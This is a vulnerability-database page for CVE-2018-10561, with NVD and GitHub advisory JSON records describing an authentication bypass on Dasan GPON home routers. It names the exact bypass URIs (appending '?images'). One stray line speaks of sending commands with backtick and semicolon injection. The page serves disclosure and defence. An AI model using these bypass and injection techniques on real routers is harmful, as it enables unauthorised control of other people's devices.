            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dasannetworks:gpon_router:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E795B673-4FC0-4A2B-821E-63F87B90D6C6",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device."
    },
    {
      "lang": "es",
      "value": "Se ha descubierto un problema en los routers dom\u00e9sticos Dasan GPON. Es posible omitir la autenticaci\u00f3n anexionando \"?images\" a cualquier URL del dispositivo que requiera autenticaci\u00f3n, tal y como queda demostrado con los URI /menu.html?images/ o /GponForm/diag_FORM?images/. As\u00ed, se puede gestionar el dispositivo."
    }
  ],
  "id": "CVE-2018-10561",
  "lastModified": "2025-11-05T19:23:25.363",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": true,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary"
      }
    ]
  },
  "published": "2018-05-04T03:29:00.227",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/107053"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/44576/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Technical Description",
        "Third Party Advisory"
      ],
      "url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/107053"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/44576/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Technical Description",
        "Third Party Advisory"
      ],
      "url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "US Government Resource"
      ],
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10561"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-287"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-287"
        }
      ],
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "type": "Secondary"
    }
  ]
}

GHSA-9F5C-V3C9-RFHG

Vulnerability from github – Published: 2022-05-14 01:29 – Updated: 2025-10-22 00:31

Details

Severity ?

9.8 (Critical)


                  
                    CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2018-10561"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-05-04T03:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.",
  "id": "GHSA-9f5c-v3c9-rfhg",
  "modified": "2025-10-22T00:31:35Z",
  "published": "2022-05-14T01:29:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10561"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10561"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/44576"
    },
    {
      "type": "WEB",
      "url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/107053"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2018-10561 (GCVE-0-2018-10561)

CISA Known Exploited Vulnerability

Data from the CISA Known Exploited Vulnerabilities Catalog

VAR-201805-0262

We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices

CNVD-2018-09230

GSD-2018-10561

FKIE_CVE-2018-10561

GHSA-9F5C-V3C9-RFHG

Tags

Sightings

Nomenclature